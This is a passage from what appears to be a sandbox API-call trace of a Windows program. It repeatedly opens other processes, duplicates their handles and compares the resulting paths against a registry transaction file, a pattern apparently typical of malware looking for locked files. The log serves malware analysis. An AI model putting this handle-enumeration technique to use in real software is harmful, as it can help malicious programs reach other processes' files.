[0155.056] CloseHandle (hObject=0x62c) returned 1 [0155.056] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0155.056] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.057] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.058] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.058] CloseHandle (hObject=0x670) returned 1 [0155.058] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.058] CloseHandle (hObject=0x680) returned 1 [0155.058] CloseHandle (hObject=0x62c) returned 1 [0155.058] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0155.058] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.059] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.059] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.059] CloseHandle (hObject=0x670) returned 1 [0155.059] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.059] CloseHandle (hObject=0x680) returned 1 [0155.060] CloseHandle (hObject=0x62c) returned 1 [0155.060] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0155.060] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.060] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.061] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.061] CloseHandle (hObject=0x670) returned 1 [0155.061] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.061] CloseHandle (hObject=0x680) returned 1 [0155.061] CloseHandle (hObject=0x62c) returned 1 [0155.061] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0155.061] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.062] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.063] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.064] CloseHandle (hObject=0x670) returned 1 [0155.064] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.064] CloseHandle (hObject=0x680) returned 1 [0155.064] CloseHandle (hObject=0x62c) returned 1 [0155.064] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0155.064] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.064] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.065] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.065] CloseHandle (hObject=0x670) returned 1 [0155.065] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.065] CloseHandle (hObject=0x680) returned 1 [0155.065] CloseHandle (hObject=0x62c) returned 1 [0155.065] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0155.065] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.066] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.067] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.067] CloseHandle (hObject=0x670) returned 1 [0155.067] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.067] CloseHandle (hObject=0x680) returned 1 [0155.067] CloseHandle (hObject=0x62c) returned 1 [0155.067] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0155.067] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.068] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.068] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.068] CloseHandle (hObject=0x670) returned 1 [0155.068] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.068] CloseHandle (hObject=0x680) returned 1 [0155.068] CloseHandle (hObject=0x62c) returned 1 [0155.068] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0155.068] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.069] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.070] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.070] CloseHandle (hObject=0x670) returned 1 [0155.070] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.070] CloseHandle (hObject=0x680) returned 1 [0155.070] CloseHandle (hObject=0x62c) returned 1 [0155.070] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0155.070] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.071] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.071] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.071] CloseHandle (hObject=0x670) returned 1 [0155.071] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.071] CloseHandle (hObject=0x680) returned 1 [0155.071] CloseHandle (hObject=0x62c) returned 1 [0155.071] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0155.072] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.072] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.073] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.073] CloseHandle (hObject=0x670) returned 1 [0155.073] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.073] CloseHandle (hObject=0x680) returned 1 [0155.073] CloseHandle (hObject=0x62c) returned 1 [0155.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0155.073] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.074] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.074] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.074] CloseHandle (hObject=0x670) returned 1 [0155.074] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.075] CloseHandle (hObject=0x680) returned 1 [0155.075] CloseHandle (hObject=0x62c) returned 1 [0155.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0155.075] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.075] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.076] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.076] CloseHandle (hObject=0x670) returned 1 [0155.076] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.076] CloseHandle (hObject=0x680) returned 1 [0155.076] CloseHandle (hObject=0x62c) returned 1 [0155.076] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0155.076] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.077] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.077] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.078] CloseHandle (hObject=0x670) returned 1 [0155.078] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.078] CloseHandle (hObject=0x680) returned 1 [0155.078] CloseHandle (hObject=0x62c) returned 1 [0155.078] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0155.078] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.079] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.079] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.079] CloseHandle (hObject=0x670) returned 1 [0155.079] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.079] CloseHandle (hObject=0x680) returned 1 [0155.079] CloseHandle (hObject=0x62c) returned 1 [0155.079] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0155.079] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.080] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.081] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.081] CloseHandle (hObject=0x670) returned 1 [0155.081] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.081] CloseHandle (hObject=0x680) returned 1 [0155.081] CloseHandle (hObject=0x62c) returned 1 [0155.081] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0155.081] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.082] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.082] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.082] CloseHandle (hObject=0x670) returned 1 [0155.083] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.083] CloseHandle (hObject=0x680) returned 1 [0155.083] CloseHandle (hObject=0x62c) returned 1 [0155.083] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0155.083] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.083] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.083] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.084] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.084] CloseHandle (hObject=0x670) returned 1 [0155.084] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.084] CloseHandle (hObject=0x680) returned 1 [0155.084] CloseHandle (hObject=0x62c) returned 1 [0155.084] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0155.084] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.085] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.086] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.086] CloseHandle (hObject=0x670) returned 1 [0155.086] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.086] CloseHandle (hObject=0x680) returned 1 [0155.086] CloseHandle (hObject=0x62c) returned 1 [0155.086] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0155.086] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.087] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.087] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.087] CloseHandle (hObject=0x670) returned 1 [0155.087] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.087] CloseHandle (hObject=0x680) returned 1 [0155.087] CloseHandle (hObject=0x62c) returned 1 [0155.087] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0155.088] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.088] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.089] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.089] CloseHandle (hObject=0x670) returned 1 [0155.089] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.089] CloseHandle (hObject=0x680) returned 1 [0155.089] CloseHandle (hObject=0x62c) returned 1 [0155.089] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0155.089] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.090] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.090] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.090] CloseHandle (hObject=0x670) returned 1 [0155.090] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0155.090] CloseHandle (hObject=0x680) returned 1 [0155.091] CloseHandle (hObject=0x62c) returned 1 [0155.091] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0155.091] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.091] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.092] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.092] CloseHandle (hObject=0x670) returned 1 [0155.092] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.092] CloseHandle (hObject=0x680) returned 1 [0155.092] CloseHandle (hObject=0x62c) returned 1 [0155.092] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0155.092] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.092] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.093] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.093] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.094] CloseHandle (hObject=0x670) returned 1 [0155.094] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0155.094] CloseHandle (hObject=0x680) returned 1 [0155.094] CloseHandle (hObject=0x62c) returned 1 [0155.095] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0155.095] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.095] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.096] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.096] CloseHandle (hObject=0x670) returned 1 [0155.096] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.096] CloseHandle (hObject=0x680) returned 1 [0155.096] CloseHandle (hObject=0x62c) returned 1 [0155.096] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0155.096] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.097] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.097] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.098] CloseHandle (hObject=0x670) returned 1 [0155.098] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.098] CloseHandle (hObject=0x680) returned 1 [0155.098] CloseHandle (hObject=0x62c) returned 